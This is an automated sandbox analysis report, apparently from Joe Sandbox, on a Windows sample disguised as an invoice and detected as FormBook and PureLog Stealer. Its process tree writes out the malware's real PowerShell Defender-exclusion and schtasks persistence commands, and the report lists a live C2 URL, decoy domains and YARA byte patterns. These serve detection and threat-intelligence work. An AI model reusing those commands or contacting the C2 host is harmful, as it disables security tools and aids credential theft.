Edit tour

Windows Analysis Report
Invoice and packing list.exe

Overview

General Information

Sample name:	Invoice and packing list.exe
Analysis ID:	1590095
MD5:	735a274389af85c4b4f6ccd684b1b30a
SHA1:	2ae6619febb0c9f4d318daa9f28172c2ed9ed4da
SHA256:	bcfeb4ec31e731899a0ddd0a608aa7ecbfbdbf37f4ac3810b275ba6905a1969b
Tags:	exeuser-James_inthe_box
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to resolve many domain names, but no domain seems valid

Uses netstat to query active network connections and open ports

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Invoice and packing list.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\Invoice and packing list.exe" MD5: 735A274389AF85C4B4F6CCD684B1B30A)

powershell.exe (PID: 4984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2364 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 3876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

NETSTAT.EXE (PID: 6580 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)

cmd.exe (PID: 5584 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

autofmt.exe (PID: 6644 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)

autofmt.exe (PID: 6392 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)

rundll32.exe (PID: 5968 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

utlAHqvw.exe (PID: 1856 cmdline: C:\Users\user\AppData\Roaming\utlAHqvw.exe MD5: 735A274389AF85C4B4F6CCD684B1B30A)

schtasks.exe (PID: 4120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6779:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d0a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xaee7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15dcf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9e30:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa09a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15bcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x156b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15ccf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15e47:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaab2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14934:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb7ab:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1be0f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ce12:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18d31:$sqlite3step: 68 34 1C 7B E1 0x18e44:$sqlite3step: 68 34 1C 7B E1 0x18d60:$sqlite3text: 68 38 2A 90 C5 0x18e85:$sqlite3text: 68 38 2A 90 C5 0x18d73:$sqlite3blob: 68 53 D8 7F 8C 0x18e9b:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x68a9:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d1d8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb017:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15eff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9f60:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa1ca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15cfd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x157e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15dff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15f77:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xabe2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14a64:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb8db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bf3f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cf42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e61:$sqlite3step: 68 34 1C 7B E1 0x18f74:$sqlite3step: 68 34 1C 7B E1 0x18e90:$sqlite3text: 68 38 2A 90 C5 0x18fb5:$sqlite3text: 68 38 2A 90 C5 0x18ea3:$sqlite3blob: 68 53 D8 7F 8C 0x18fcb:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2068007786.0000000006D60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x82229:$a1: 3C 30 50 4F 53 54 74 09 40 0xaf649:$a1: 3C 30 50 4F 53 54 74 09 40 0x98b58:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc5f78:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x86997:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb3db7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x9187f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbec9f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x858e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85b4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb2d00:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb2f6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9167d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbea9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x91169:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbe589:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x9177f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbeb9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x918f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbed17:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x86562:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb3982:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x903e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbd804:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8725b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb467b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x978bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xc4cdf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x988c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x947e1:$sqlite3step: 68 34 1C 7B E1 0x948f4:$sqlite3step: 68 34 1C 7B E1 0xc1c01:$sqlite3step: 68 34 1C 7B E1 0xc1d14:$sqlite3step: 68 34 1C 7B E1 0x94810:$sqlite3text: 68 38 2A 90 C5 0x94935:$sqlite3text: 68 38 2A 90 C5 0xc1c30:$sqlite3text: 68 38 2A 90 C5 0xc1d55:$sqlite3text: 68 38 2A 90 C5 0x94823:$sqlite3blob: 68 53 D8 7F 8C 0x9494b:$sqlite3blob: 68 53 D8 7F 8C 0xc1c43:$sqlite3blob: 68 53 D8 7F 8C 0xc1d6b:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.4504401224.000000000F929000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xaf2:$a2: pass 0xaf8:$a3: email 0xaff:$a4: login 0xb06:$a5: signin 0xb17:$a6: persistent 0xcea:$r1: C:\Users\user\AppData\Roaming\21N13Q01\21Nlog.ini
0000000B.00000002.2097300869.000000000326D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2064262392.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Invoice and packing list.exe PID: 4424	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
